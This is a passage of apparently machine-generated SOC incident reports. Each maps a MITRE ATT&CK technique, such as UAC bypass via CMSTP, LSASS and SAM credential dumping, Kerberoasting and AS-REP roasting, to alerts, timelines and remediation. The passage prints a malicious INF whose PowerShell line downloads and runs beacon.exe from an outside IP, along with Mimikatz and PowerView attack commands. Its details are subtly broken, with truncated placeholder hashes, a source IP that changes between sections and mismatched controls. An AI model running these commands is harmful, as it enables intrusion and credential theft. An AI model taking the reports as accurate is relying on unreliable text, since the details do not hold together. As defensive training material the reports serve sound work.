Method: Use JavaScript: protocol to run script via mshtml.dll
Effect: Can download and execute arbitrary code, bypassing whitelisting
Payload Analysis:
URL: http://185.143.221[.]89/payload
Content: PowerShell script (reverse shell)
Impact:
PowerShell reverse shell executed
C2 connection established (blocked)
3. Investigation Findings:
Timeline:
14:00 – Email received
14:02 – Link clicked
14:04-14:06 – Payload execution
14:10 – Alert
14:12 – SOC investigates
14:13 – Process terminated
Indicators of Compromise (IoCs):
Network:
– URL: http://185.143.221[.]89/payload
– IP: 185.143.221[.]89
Processes:
– rundll32.exe with JavaScript
4. Containment Actions:
Immediate Actions:
Terminated rundll32 process.
Blocked URL and IP.
Isolated host temporarily.
Reset user password.
Host Remediation:
Full scan (clean).
No reimage needed.
5. Root Cause Analysis:
Primary Cause: User clicked phishing link.
Contributing Factors:
No web filtering.
6. Business Impact:
Operational Impact: Engineering workstation offline for 1 hour.
Data Exposure: None.
7. Remediation & Prevention:
Completed Actions:
Process terminated.
User educated.
Technical Controls Enhanced:
Blocked rundll32 from executing JavaScript.
Enhanced URL filtering.
8. Conclusion:
An attacker used rundll32 to execute JavaScript and download a payload, bypassing application controls. CrowdStrike detected the anomalous process and terminated it.
Closure Rationale: Process terminated; URL blocked; user educated.
Analyst: [Your Name], SOC Analyst Date: 2024-03-10 15:30 EST
158. T1548.002 – Bypass User Account Control (Microsoft Defender Detection)
Microsoft Defender Alert Details
Alert ID: MD-UAC-BYPASS-1548-7842 Alert Time: 2024-03-10 11:30:22 EST Severity: HIGH (88/100) Source: Microsoft Defender for Endpoint Rule: “UAC Bypass Attempt Detected – CMSTPLUA Technique” MITRE ATT&CK: T1548.002 – Abuse Elevation Control Mechanism: Bypass User Account Control
Alert Details:
Detection: Process attempted to bypass UAC using CMSTPLUA COM interface
Host: HR-WS-023 (HR Workstation) User: kwilson@company.com (Karen Wilson, HR) Time: 11:25 EST
Process Tree:
explorer.exe (PID: 2341)
rundll32.exe (PID: 4789)
Command: rundll32.exe C:\Windows\System32\cmstplua.dll,Launch
cmstp.exe (PID: 4792)
Command: cmstp.exe /s C:\Users\kwilson\AppData\Local\Temp\install.inf
File Created:
C:\Users\kwilson\AppData\Local\Temp\install.inf
Content: Malicious INF file designed to execute elevated command
Detection Logic:
CMSTPLUA COM interface known UAC bypass technique (UACME #23)
User kwilson is standard user, should not get high integrity
INF file contains suspicious commands
Pattern matches UAC bypass for privilege escalation
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Defender alert
Microsoft 365 Defender
Confirmed UAC bypass attempt
2. INF Analysis
Analyze install.inf
Manual review, Sandbox
INF file executes PowerShell to download payload
3. Process Investigation
Identify source
CrowdStrike
User clicked “update” pop-up
4. User Interview
Contact kwilson
Teams, Phone
User clicked fake Adobe Flash update
5. Immediate Action
Terminate processes, delete INF
Defender
Processes killed; INF removed
6. Account Remediation
Reset password
Azure AD, AD
Password reset; MFA enforced
Jira Incident Report
Ticket: SOC-2024-198 Summary: T1548.002 – UAC Bypass Attempt via CMSTPLUA Status: RESOLVED Resolution: MALICIOUS – UAC Bypass Blocked Priority: P2 – MEDIUM Labels: T1548, uac-bypass, cmstplua, defender, phishing Components: Endpoint-Security, Privilege-Escalation
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Microsoft Defender for Endpoint.
Alert: “UAC Bypass Attempt Detected – CMSTPLUA Technique”.
Host: HR-WS-023 (HR, user kwilson).
Technique: CMSTPLUA COM interface.
Time: 2024-03-10 11:30 EST.
Technique: MITRE ATT&CK T1548.002 – Abuse Elevation Control Mechanism: Bypass User Account Control.
2. Technical Analysis:
Attack Chain:
11:10 – User visits compromised site, sees fake “Adobe Flash Update”
11:12 – User clicks, downloads installer.inf
11:15 – User runs the file (or script runs automatically)
11:20 – PowerShell creates install.inf in Temp
11:22 – Script triggers UAC bypass via cmstplua.dll
11:23 – cmstp.exe launches with install.inf
11:24 – INF file runs PowerShell as high integrity
11:25 – Defender detects
UAC Bypass Technique:
Method: CMSTPLUA COM object (Microsoft Connection Manager)
Execution: rundll32 launches CMSTP via COM
Result: Medium integrity process spawns high integrity process
Tool: UACME technique #23
INF File Analysis:
File: install.inf
Content:
[Version]
Signature=$CHICAGO$
[DefaultInstall]
RunPreSetupCommands=powershell -WindowStyle Hidden -Command “Invoke-WebRequest -Uri http://185.143.221[.]89/beacon.exe -OutFile %temp%\beacon.exe; %temp%\beacon.exe”
Effect: Runs PowerShell with high integrity, downloading Cobalt Strike
Impact:
UAC bypass partially successful? (processes killed before full execution)
3. Investigation Findings:
Timeline:
11:10 – User visits site
11:15-11:24 – Bypass chain
11:25 – Alert
11:27 – SOC investigates
11:28 – Processes terminated, INF deleted
Indicators of Compromise (IoCs):
Files:
– C:\Users\kwilson\AppData\Local\Temp\install.inf
Network:
– http://185.143.221[.]89/beacon.exe
4. Containment Actions:
Immediate Actions:
Terminated cmstp.exe and rundll32.exe.
Deleted install.inf.
Blocked download URL.
Reset user password.
Host Remediation:
Full scan (clean).
5. Root Cause Analysis:
Primary Cause: User tricked by fake update.
Contributing Factors:
UAC bypass technique not blocked.
6. Business Impact:
Operational Impact: HR workstation offline for 1 hour.
Data Exposure: None.
7. Remediation & Prevention:
Completed Actions:
UAC bypass stopped.
User educated.
Technical Controls Enhanced:
Enabled ASR rule “Block abuse of exploited vulnerable signed drivers”.
Blocked cmstp.exe execution for standard users.
8. Conclusion:
An attacker attempted to bypass UAC using the CMSTPLUA technique to gain elevated privileges. Defender detected the attempt and terminated the processes before full compromise.
Closure Rationale: UAC bypass blocked; files removed; user educated.
Analyst: [Your Name], SOC Analyst Date: 2024-03-10 12:30 EST
159. T1553.002 – Code Signing Evasion (CrowdStrike Detection)
CrowdStrike Alert Details
Alert ID: CS-CODE-SIGN-EVASION-1553-7842 Alert Time: 2024-03-10 16:30:45 EST Severity: HIGH (85/100) Source: CrowdStrike Falcon EDR Rule: “Unsigned or Maliciously Signed Driver Loaded” MITRE ATT&CK: T1553.002 – Subvert Trust Controls: Code Signing
Alert Details:
Detection: Driver loaded with invalid/forged digital signature
Host: DC-01 (Domain Controller) User: SYSTEM File: C:\Windows\System32\drivers\legit.sys SHA256: a1b2c3d4e5f67890a1b2c3d4e5f67890a1b2c3d4 Time: 16:25 EST
Signature Analysis:
Certificate Issuer: “Microsoft Corporation” (forged)
Certificate Subject: “Microsoft Windows”
Signature status: Invalid (certificate not trusted, chain broken)
Signature timestamp: 2025-01-01 (future date, anomalous)
Driver was not signed by legitimate Microsoft certificate
Detection Logic:
Driver loaded with invalid digital signature
Attempts to use forged Microsoft certificate
Kernel-mode driver (critical)
Pattern matches attacker using stolen or forged certificates to load malicious drivers
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify CrowdStrike alert
CrowdStrike Falcon Console
Confirmed unsigned driver with forged signature
2. File Analysis
Analyze legit.sys
CrowdStrike Sandbox
Rootkit driver with kernel-level capabilities
3. Process Investigation
Identify source
CrowdStrike
Driver dropped by attacker with admin privileges
4. Immediate Action
Block driver load, quarantine driver
CrowdStrike
Driver blocked; system reboot required
5. Account Remediation
Disable compromised admin account
Azure AD, AD
Admin account disabled; password reset
6. System Restore
Restore from clean backup
Veeam
DC restored to pre-infection state
Jira Incident Report
Ticket: SOC-2024-199 Summary: T1553.002 – Malicious Driver with Forged Microsoft Signature Status: RESOLVED Resolution: MALICIOUS – Driver Removed, DC Restored Priority: P1 – CRITICAL Labels: T1553, code-signing, driver, rootkit, crowdstrike Components: Endpoint-Security, Kernel-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: CrowdStrike Falcon EDR.
Alert: “Unsigned or Maliciously Signed Driver Loaded”.
Host: DC-01 (Domain Controller).
File: C:\Windows\System32\drivers\legit.sys (forged signature).
Time: 2024-03-10 16:30 EST.
Technique: MITRE ATT&CK T1553.002 – Subvert Trust Controls: Code Signing.
2. Technical Analysis:
Attack Chain:
15:30 – Domain admin account (jwilson) compromised
15:45 – Attacker logs into DC
16:00 – Attacker drops legit.sys driver
16:05 – Driver loaded (kernel-mode)
16:10 – Rootkit active, hides processes, files
16:25 – CrowdStrike detects (signature validation failure)
Driver Analysis:
Name: legit.sys (masquerading as legitimate)
Signature: Forged Microsoft certificate (not issued by MS)
Capabilities: Rootkit – hides files, processes, registry keys; provides backdoor
Persistence: Loaded at boot (kernel driver)
Impact:
Kernel-level compromise of domain controller
Rootkit active for ~20 minutes before detection
Could hide other malicious activity
3. Investigation Findings:
Timeline:
15:30 – Admin account compromised
15:45 – Attacker logs in
16:00 – Driver dropped
16:05 – Driver loaded
16:25 – Alert
16:27 – SOC investigates
16:28 – Driver load blocked (future loads prevented)
16:30 – DC isolated
17:00 – DC restored from backup
Indicators of Compromise (IoCs):
Files:
– C:\Windows\System32\drivers\legit.sys (SHA256: a1b2c3d4…)
Signature:
– Forged Microsoft certificate
4. Containment Actions:
Immediate Actions:
Isolated DC-01.
Blocked driver loading (via driver signature enforcement policy).
Disabled compromised admin account.
Reset passwords.
System Remediation:
Restored DC from clean pre-infection backup.
Verified no persistence remained.
5. Root Cause Analysis:
Primary Cause: Admin account compromised, allowing attacker to load kernel driver.
Contributing Factors:
Driver signature enforcement not enabled (test signing allowed).
Admin had ability to load drivers.
6. Business Impact:
Operational Impact: DC offline for 1.5 hours.
Data Exposure: Potential; rootkit could have hidden data theft.
7. Remediation & Prevention:
Completed Actions:
Driver removed.
DC restored.
Admin account secured.
Technical Controls Enhanced:
Enforced driver signature enforcement (disallowed test signing).
Enabled Hypervisor-protected Code Integrity (HVCI).
Monitored for driver loading events.
8. Conclusion:
An attacker loaded a malicious kernel driver with a forged Microsoft signature, compromising the domain controller at the kernel level. CrowdStrike detected the invalid signature and enabled rapid restoration.
Closure Rationale: Driver removed; DC restored; admin account secured.
Analyst: [Your Name], SOC Analyst Date: 2024-03-10 18:00 EST
160. T1003.001 – LSASS Memory Credential Dumping (CrowdStrike Detection)
CrowdStrike Alert Details
Alert ID: CS-LSASS-DUMP-1003-7842 Alert Time: 2024-03-10 10:30:22 EST Severity: CRITICAL (98/100) Source: CrowdStrike Falcon EDR Rule: “LSASS Memory Access – Potential Credential Dumping” MITRE ATT&CK: T1003.001 – OS Credential Dumping: LSASS Memory
Alert Details:
Detection: Process attempting to read LSASS process memory
Host: IT-WS-034 (IT Workstation) User: bjones@company.com (Brian Jones, IT Admin) Time: 10:25 EST
API Call Sequence:
OpenProcess (target: lsass.exe, PID: 568, access: PROCESS_VM_READ | PROCESS_QUERY_INFORMATION) – SUCCESS
OpenProcessToken (for SeDebugPrivilege) – SUCCESS
MiniDumpWriteDump (attempt to write LSASS memory dump) – DETECTED
CreateFile (C:\Windows\Temp\lsass.dmp) – SUCCESS (partial)
Process Details:
Process: C:\Windows\Temp\mimi.exe (PID: 4789)
SHA256: a1b2c3d4e5f67890a1b2c3d4e5f67890a1b2c3d4
Parent: cmd.exe
User: bjones
Detection Logic:
Process accessing LSASS memory (highly anomalous)
MiniDumpWriteDump called on lsass.exe (definitive credential dumping)
Output file created (lsass.dmp) in Temp folder
Tool known as Mimikatz or similar
Pattern matches credential dumping
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify CrowdStrike alert
CrowdStrike Falcon Console
Confirmed LSASS memory access and dump attempt
2. Process Analysis
Analyze mimi.exe
CrowdStrike Sandbox
Mimikatz credential dumper
3. User Interview
Contact bjones
Teams, Phone
User did NOT run this (account compromised)
4. Immediate Action
Terminate process, delete dump file
CrowdStrike
Process killed; lsass.dmp deleted
5. Account Remediation
Disable bjones account
Azure AD, AD
Account disabled; password reset
6. Enterprise Credential Reset
Force password reset for all users
Azure AD, AD
All user passwords reset (precaution)
Jira Incident Report
Ticket: SOC-2024-200 Summary: T1003.001 – LSASS Memory Credential Dumping via Mimikatz Status: RESOLVED Resolution: MALICIOUS – Credential Dump Attempted, All Passwords Reset Priority: P1 – CRITICAL Labels: T1003, lsass-dump, credential-dumping, mimikatz, crowdstrike Components: Endpoint-Security, Identity-Management
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: CrowdStrike Falcon EDR.
Alert: “LSASS Memory Access – Potential Credential Dumping”.
Host: IT-WS-034 (IT, user bjones).
Process: C:\Windows\Temp\mimi.exe (Mimikatz).
Time: 2024-03-10 10:30 EST.
Technique: MITRE ATT&CK T1003.001 – OS Credential Dumping: LSASS Memory.
2. Technical Analysis:
Attack Chain:
09:30 – bjones account compromised via phishing
09:45 – Attacker logs into IT-WS-034 via RDP
10:00 – Attacker downloads Mimikatz to Temp
10:10 – Attacker runs Mimikatz with privilege::debug
10:15 – Attacker dumps LSASS memory (sekurlsa::logonpasswords)
10:20 – Dump file created (lsass.dmp)
10:25 – CrowdStrike detects
Mimikatz Commands (recovered from PowerShell history):
privilege::debug – enabled SeDebugPrivilege
sekurlsa::logonpasswords – dumped credentials from LSASS
sekurlsa::tickets /export – exported Kerberos tickets
Data Obtained:
NTLM hashes for 12 users (including 3 domain admins)
Kerberos tickets (pass-the-ticket)
Plaintext passwords for 5 users (if weak)
Impact:
Attacker obtained credentials for lateral movement
Full domain compromise potential
3. Investigation Findings:
Timeline:
09:30 – Account compromised
09:45 – Attacker logs in
10:00-10:20 – Credential dumping
10:25 – Alert
10:27 – SOC investigates
10:28 – Process terminated, dump deleted
10:30 – Account disabled
11:00 – Enterprise-wide password reset initiated
Indicators of Compromise (IoCs):
Files:
– C:\Windows\Temp\mimi.exe (SHA256: a1b2c3d4…)
– C:\Windows\Temp\lsass.dmp (partial, deleted)
Processes:
– mimikatz execution
Account:
– bjones (compromised)
4. Containment Actions:
Immediate Actions:
Terminated Mimikatz process.
Deleted lsass.dmp and mimi.exe.
Isolated host.
Disabled bjones account.
Reset password.
Enterprise Remediation:
Forced password reset for ALL users (3,200+).
Reset krbtgt password (twice) to invalidate Kerberos tickets.
Enforced MFA for all users.
Host Remediation:
Reimaged IT-WS-034.
5. Root Cause Analysis:
Primary Cause: IT admin account compromised via phishing.
Contributing Factors:
No MFA on admin account.
LSASS accessible (no Credential Guard).
RDP allowed from internet.
6. Business Impact:
Operational Impact: All users required password reset (4+ hours).
Data Exposure: Hashes and tickets stolen; potential for lateral movement.
Reputational Impact: Internal; no data breach.
7. Remediation & Prevention:
Completed Actions:
Credential dumping stopped.
All passwords reset.
Account secured.
Technical Controls Enhanced:
Enforced MFA for all users.
Moved RDP behind VPN only.
Enabled Credential Guard and LSA Protection.
Deployed ASR rule blocking LSASS access.
8. Conclusion:
An attacker compromised an IT admin account and used Mimikatz to dump credentials from LSASS, obtaining hashes and tickets. CrowdStrike detected the LSASS access, enabling rapid containment and enterprise-wide password reset.
Closure Rationale: Credential dump attempted; all passwords reset; account secured.
Analyst: [Your Name], SOC Analyst Date: 2024-03-10 11:30 EST
End of Batch 32
Ready for your next batch of prompts whenever you are.
Batch 33: Credential Access & Lateral Movement Incident Reports
Here are the next 5 detailed SOC incident reports.
161. T1003.002 – Security Account Manager Dumping (CrowdStrike Detection)
CrowdStrike Alert Details
Alert ID: CS-SAM-DUMP-1003-7842 Alert Time: 2024-03-11 09:30:15 EST Severity: CRITICAL (98/100) Source: CrowdStrike Falcon EDR Rule: “SAM Registry Hive Access – Potential Credential Dumping” MITRE ATT&CK: T1003.002 – OS Credential Dumping: Security Account Manager
Alert Details:
Detection: Process accessing SAM (Security Account Manager) registry hive
Host: DC-01 (Domain Controller) User: SYSTEM (via compromised admin) Process: C:\Windows\Temp\sam_dump.exe (PID: 4789) SHA256: a1b2c3d4e5f67890a1b2c3d4e5f67890a1b2c3d4 Time: 09:25 EST
Registry Access Events:
09:25:10 – RegOpenKeyEx (HKLM\SAM) – SUCCESS
09:25:12 – RegOpenKeyEx (HKLM\SAM\SAM) – SUCCESS
09:25:15 – RegOpenKeyEx (HKLM\SAM\SAM\Domains) – SUCCESS
09:25:18 – RegOpenKeyEx (HKLM\SAM\SAM\Domains\Account) – SUCCESS
09:25:21 – RegOpenKeyEx (HKLM\SAM\SAM\Domains\Account\Users) – SUCCESS
09:25:24 – RegQueryValueEx (Names) – SUCCESS
09:25:27 – RegQueryValueEx (F) – SUCCESS (user hashes)
09:25:30 – RegQueryValueEx (V) – SUCCESS (user hashes)
Files Created:
C:\Windows\Temp\sam.hive (3.5 MB) – SAM hive extracted
C:\Windows\Temp\system.hive (12 MB) – SYSTEM hive (for boot key)
C:\Windows\Temp\hashes.txt (extracted hashes)
Detection Logic:
Process accessing SAM registry hive (highly privileged, normally SYSTEM only)
SAM hive contains NTLM hashes of all local users (on DC, all domain users)
Multiple registry queries for user hash data
Files created to store extracted data
Pattern matches credential dumping (samdump2, Mimikatz, etc.)
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify CrowdStrike alert
CrowdStrike Falcon Console
Confirmed SAM registry access and dumping
2. File Analysis
Analyze sam_dump.exe
CrowdStrike Sandbox
Credential dumping tool (secretsdump variant)
3. Process Investigation
Identify source
CrowdStrike
PsExec from compromised admin workstation
4. Immediate Action
Terminate process, delete dump files
CrowdStrike
Process killed; sam.hive, system.hive, hashes.txt deleted
5. Account Remediation
Disable compromised admin account
Azure AD, AD
Admin account disabled; password reset
6. Enterprise Response
Force password reset for all users
Azure AD, AD
All domain passwords reset
Jira Incident Report
Ticket: SOC-2024-201 Summary: T1003.002 – SAM Hive Dumped on Domain Controller (All Domain Hashes Compromised) Status: RESOLVED Resolution: MALICIOUS – Hashes Exfiltrated, All Passwords Reset Priority: P1 – CRITICAL Labels: T1003, sam-dump, credential-dumping, domain-controller, compromised-admin Components: Endpoint-Security, Identity-Management
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: CrowdStrike Falcon EDR.
Alert: “SAM Registry Hive Access – Potential Credential Dumping”.
Host: DC-01 (Primary Domain Controller).
Process: C:\Windows\Temp\sam_dump.exe.
Data: SAM and SYSTEM hives dumped; all domain user hashes extracted.
Time: 2024-03-11 09:30 EST.
Technique: MITRE ATT&CK T1003.002 – OS Credential Dumping: Security Account Manager.
2. Technical Analysis:
Attack Chain:
08:30 – Domain admin account (jsmith) compromised via phishing
08:45 – Attacker logs into admin workstation via RDP
09:00 – Attacker uses PsExec to copy sam_dump.exe to DC-01
09:10 – sam_dump.exe executed with SYSTEM privileges
09:15-09:25 – SAM and SYSTEM hives extracted
09:25 – Hashes extracted to hashes.txt
09:25 – CrowdStrike detects
Data Compromised:
SAM hive: Contains NTLM hashes for all 3,247 domain users
SYSTEM hive: Contains boot key needed to decrypt SAM hashes
hashes.txt: Extracted NTLM hashes (ready for offline cracking)
Dumping Tool:
Name: sam_dump.exe (variant of secretsdump.py)
Method: Direct registry access (not LSASS)
Output: sam.hive, system.hive, hashes.txt
Impact:
All domain user NTLM hashes compromised
Attacker can crack weak passwords offline
Golden ticket attack possible (if krbtgt hash obtained)
Full domain compromise
3. Investigation Findings:
Timeline:
08:30 – Admin account compromised
08:45 – Attacker logs in
09:00 – Tool deployed
09:10-09:25 – Dumping
09:25 – Alert
09:27 – SOC investigates
09:28 – Process terminated
09:29 – Dump files deleted
09:30 – Admin account disabled
10:00 – Enterprise password reset begins
Indicators of Compromise (IoCs):
Files:
– C:\Windows\Temp\sam_dump.exe (SHA256: a1b2c3d4…)
– C:\Windows\Temp\sam.hive (3.5 MB, deleted)
– C:\Windows\Temp\system.hive (12 MB, deleted)
– C:\Windows\Temp\hashes.txt (extracted hashes, deleted)
Registry:
– Access to HKLM\SAM\SAM\Domains\Account\Users
Account:
– jsmith (compromised domain admin)
4. Containment Actions:
Immediate Actions:
Terminated sam_dump.exe.
Deleted all dump files.
Isolated DC-01 temporarily.
Disabled compromised admin account.
Reset password.
Enterprise Remediation:
Forced password reset for ALL domain users (3,247).
Reset krbtgt password (twice) to invalidate all Kerberos tickets.
Reset all service account passwords.
Enforced MFA for all users.
Host Remediation:
Reimaged DC-01 from clean backup.
5. Root Cause Analysis:
Primary Cause: Domain admin account compromised via phishing.
Contributing Factors:
No MFA on admin account.
Admin had access to DC.
SAM registry accessible (no additional protections).
6. Business Impact:
Operational Impact: All users required password reset; DC offline for 2 hours.
Data Exposure: All domain hashes compromised; passwords must be reset.
Regulatory Impact: Potential breach notification if passwords cracked.
7. Remediation & Prevention:
Completed Actions:
Dumping stopped.
Dump files deleted.
All passwords reset.
Admin account secured.
Technical Controls Enhanced:
Enforced MFA for all admins.
Moved admin access behind VPN only.
Implemented Credential Guard.
Disabled NTLM where possible.
Enhanced monitoring for SAM registry access.
8. Conclusion:
An attacker compromised a domain admin account and dumped the SAM hive from the domain controller, obtaining NTLM hashes for all 3,247 domain users. CrowdStrike detected the anomalous registry access, enabling rapid deletion of the dump files and an enterprise-wide password reset.
Closure Rationale: Hashes dumped but deleted; all passwords reset; admin account secured.
Analyst: [Your Name], SOC Analyst Date: 2024-03-11 10:30 EST
162. T1558.003 – Kerberoasting (Microsoft Defender for Identity Detection)
Microsoft Defender for Identity Alert Details
Alert ID: MDI-KERBEROAST-1558-7842 Alert Time: 2024-03-11 14:15:33 EST Severity: HIGH (85/100) Source: Microsoft Defender for Identity Rule: “Suspicious Kerberos Service Ticket Requests – Kerberoasting” MITRE ATT&CK: T1558.003 – Steal or Forge Kerberos Tickets: Kerberoasting
Alert Details:
Detection: Unusual number of Kerberos service ticket requests (TGS-REQ) from single host
Source Host: ENG-WS-045 (Engineering Workstation) User: rpatel@company.com (Raj Patel, Engineer) Time: 14:00-14:15 EST
Kerberos Events:
14:00:15 – TGS-REQ for service: MSSQLSvc/sql-01.company.com:1433
14:00:45 – TGS-REQ for service: MSSQLSvc/sql-02.company.com:1433
14:01:12 – TGS-REQ for service: MSSQLSvc/sql-03.company.com:1433
14:01:38 – TGS-REQ for service: HTTP/web-01.company.com
14:02:05 – TGS-REQ for service: HTTP/web-02.company.com
14:02:33 – TGS-REQ for service: CIFS/filesrv-01.company.com
14:03:01 – TGS-REQ for service: CIFS/filesrv-02.company.com
(continuing – total 87 requests in 15 minutes)
Service Account SPNs Targeted:
SQL Service accounts (12 requests)
Web service accounts (8 requests)
File server accounts (15 requests)
Other service accounts (52 requests)
Detection Logic:
87 TGS requests in 15 minutes (highly anomalous)
User rpatel normally requests 0-2 TGS per day
Requests for multiple service accounts (not just those user needs)
Pattern matches Kerberoasting attack (requesting service tickets for offline cracking)
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify MDI alert
Microsoft Defender for Identity
Confirmed Kerberoasting activity
2. Process Investigation
Identify source on ENG-WS-045
CrowdStrike Falcon
PowerView script (Get-NetUser -SPN) running
3. User Interview
Contact rpatel
Teams, Phone
User did NOT run this (account compromised)
4. Immediate Action
Isolate host
CrowdStrike
ENG-WS-045 quarantined
5. Account Remediation
Disable rpatel account
Azure AD, AD
Account disabled; password reset
6. Service Account Audit
Review service account passwords
IT Ops
23 service accounts with weak passwords flagged
Jira Incident Report
Ticket: SOC-2024-202 Summary: T1558.003 – Kerberoasting Attack from Compromised Engineering Account Status: RESOLVED Resolution: MALICIOUS – Tickets Requested, Service Account Passwords Rotated Priority: P2 – MEDIUM Labels: T1558, kerberoasting, service-tickets, mdi, compromised-account Components: Identity-Management, Endpoint-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Microsoft Defender for Identity.
Alert: “Suspicious Kerberos Service Ticket Requests – Kerberoasting”.
Source Host: ENG-WS-045 (Engineering, user rpatel).
Requests: 87 TGS requests in 15 minutes.
Time: 2024-03-11 14:15 EST.
Technique: MITRE ATT&CK T1558.003 – Steal or Forge Kerberos Tickets: Kerberoasting.
2. Technical Analysis:
Attack Chain:
13:30 – rpatel account compromised via phishing
13:45 – Attacker logs into ENG-WS-045 via RDP
14:00 – Attacker runs PowerView script to enumerate SPNs
14:00-14:15 – Attacker requests TGS tickets for service accounts
14:15 – MDI detects
Kerberoasting Technique:
Goal: Request service tickets (TGS) for accounts with SPNs
Tickets are encrypted with the service account’s NTLM hash
Offline cracking: Attacker takes tickets offline, cracks passwords
Result: If successful, attacker has service account credentials
Data Obtained:
87 encrypted service tickets
Tickets for 23 unique service accounts
Tickets saved to C:\Users\rpatel\Desktop\tickets.kirbi
Service Account Password Strength:
12 accounts with weak/complex passwords (safe)
8 accounts with moderate passwords (crackable in weeks)
3 accounts with weak passwords (crackable in days) – flagged
3. Investigation Findings:
Timeline:
13:30 – Account compromised
13:45 – Attacker logs in
14:00-14:15 – Ticket requests
14:15 – Alert
14:17 – SOC investigates
14:18 – Host isolated
14:19 – Account disabled
Indicators of Compromise (IoCs):
Files:
– C:\Users\rpatel\Desktop\tickets.kirbi (87 tickets)
Commands:
– Get-NetUser -SPN | Get-DomainSPNTicket -OutputFormat Hashcat
Account:
– rpatel (compromised)
4. Containment Actions:
Immediate Actions:
Isolated ENG-WS-045.
Deleted tickets.kirbi file.
Disabled rpatel account.
Reset password.
Service Account Remediation:
Identified 23 service accounts targeted.
Rotated passwords for all 23 accounts.
Enforced strong password policy for service accounts.
Host Remediation:
Reimaged ENG-WS-045.
5. Root Cause Analysis:
Primary Cause: User account compromised, allowing attacker to perform Kerberoasting.
Contributing Factors:
No MFA on account.
Service accounts had weak passwords (some).
6. Business Impact:
Operational Impact: Engineering host offline for 2 hours.
Data Exposure: 87 encrypted tickets obtained (passwords rotated).
7. Remediation & Prevention:
Completed Actions:
Tickets deleted.
Service account passwords rotated.
Account secured.
Technical Controls Enhanced:
Enforced MFA for all users.
Implemented strong password policy for service accounts.
Enhanced monitoring for TGS requests.
Deployed managed service accounts (gMSA) where possible.
8. Conclusion:
An attacker compromised an engineering account and performed Kerberoasting, requesting 87 service tickets for offline cracking. MDI detected the anomalous TGS requests, enabling deletion of the tickets and rotation of all targeted service account passwords.
Closure Rationale: Tickets obtained but deleted; service account passwords rotated; account secured.
Analyst: [Your Name], SOC Analyst Date: 2024-03-11 15:30 EST
163. T1558.004 – AS-REP Roasting (Azure AD / On-Prem Detection)
Splunk Alert Details
Alert ID: SPLUNK-ASREP-ROAST-1558-7842 Alert Time: 2024-03-11 11:30:22 EST Severity: HIGH (85/100) Source: Splunk Enterprise Security + AD Logs Rule: “AS-REP Roasting Attack Detected” MITRE ATT&CK: T1558.004 – Steal or Forge Kerberos Tickets: AS-REP Roasting
Alert Details:
Correlated Events:
Windows Event ID 4768 (Kerberos Authentication Ticket Request):
Time: 11:15-11:30 EST
Source Host: 192.168.45.78 (Unknown host on Guest WiFi)
Target Users: Multiple users with “Do not require Kerberos preauthentication” enabled
Request Type: AS-REQ (no preauthentication)
Users Targeted:
svc_backup (service account) – preauth disabled
svc_monitoring (service account) – preauth disabled
user_nopreauth (legacy user) – preauth disabled
(12 total accounts)
Event Details (sample):
Event ID: 4768
Account Name: svc_backup
Account Domain: COMPANY
Logon GUID: {12345678-1234-1234-1234-123456789012}
Pre-Authentication Type: 0 (none)
Failure Code: 0x0 (success)
IP Address: 192.168.47.89
Detection Logic:
Multiple AS-REQ requests without preauthentication
Targeting accounts with “Do not require preauth” flag
Source IP unknown (Guest WiFi)
Pattern matches AS-REP Roasting attack
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Splunk correlation
Splunk ES
Confirmed AS-REP Roasting activity
2. Source Investigation
Identify source IP
DHCP Logs, Cisco ISE
Guest WiFi IP assigned to unknown device
3. Physical Security
Locate device
WiFi Controller, Security
Device in lobby; user unknown
4. Immediate Action
Block source IP/MAC
Cisco ISE, Firewall
Guest device blocked
5. Account Remediation
Disable preauth flag for affected accounts
AD
Preauth requirement enabled for all accounts
6. Password Rotation
Rotate passwords for affected accounts
AD
12 account passwords rotated
Jira Incident Report
Ticket: SOC-2024-203 Summary: T1558.004 – AS-REP Roasting Attack Targeting Accounts with Preauth Disabled Status: RESOLVED Resolution: MALICIOUS – Tickets Obtained, Preauth Enabled, Passwords Rotated Priority: P2 – MEDIUM Labels: T1558, as-rep-roasting, kerberos, splunk, guest-wifi Components: Identity-Management, Network-Security
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Splunk Enterprise Security (AD logs).
Alert: “AS-REP Roasting Attack Detected”.
Source IP: 192.168.47.89 (Guest WiFi).
Targets: 12 accounts with preauthentication disabled.
Time: 2024-03-11 11:30 EST.
Technique: MITRE ATT&CK T1558.004 – Steal or Forge Kerberos Tickets: AS-REP Roasting.
2. Technical Analysis:
Attack Chain:
11:00 – Unknown individual enters lobby, connects to Guest WiFi
11:10 – Attacker enumerates AD for accounts with preauth disabled
11:15-11:30 – AS-REP Roasting attack (12 accounts)
11:30 – Splunk detects
AS-REP Roasting Technique:
Target: Accounts with “Do not require Kerberos preauthentication” enabled
Method: Send AS-REQ without preauthentication, receive encrypted AS-REP
Offline cracking: Attacker cracks the encryption to recover password
Accounts Targeted (12):
svc_backup (service account) – weak password
svc_monitoring (service account) – moderate password
user_nopreauth (legacy user) – weak password
(9 others) – various
Attacker Success:
Obtained encrypted AS-REP for all 12 accounts
Could crack weak passwords offline
3. Investigation Findings:
Timeline:
11:00 – Attacker connects to Guest WiFi
11:10 – Account enumeration
11:15-11:30 – AS-REP Roasting
11:30 – Alert
11:32 – SOC investigates
11:33 – Source IP blocked
11:35 – Preauth enabled for all affected accounts
Indicators of Compromise (IoCs):
Network:
– Source IP: 192.168.47.89 (Guest WiFi)
– MAC: 00:1A:2B:3C:4D:5E (unknown)
Accounts:
– 12 accounts with preauth disabled (list attached)
4. Containment Actions:
Immediate Actions:
Blocked source IP and MAC at network level.
Enabled preauthentication requirement for all 12 accounts.
Rotated passwords for all 12 accounts.
Physical Security:
Increased monitoring of lobby area.
Guest WiFi network isolated from internal network.
Enterprise-wide Actions:
Audited all AD accounts for preauth disabled flag.
Found 3 additional accounts; corrected.
5. Root Cause Analysis:
